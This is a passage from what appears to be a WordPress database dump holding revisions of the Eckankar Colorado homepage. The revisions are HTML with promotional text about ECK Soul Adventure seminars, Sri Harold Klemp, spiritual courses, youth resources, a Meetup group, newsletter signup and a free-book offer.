Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-18 13:34:35','2023-11-18 20:34:35','',7160,'https://eckankar-colorado.org/?p=269399',0,'revision','',0),(269400,2,'2023-11-18 13:36:17','2023-11-18 20:36:17','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 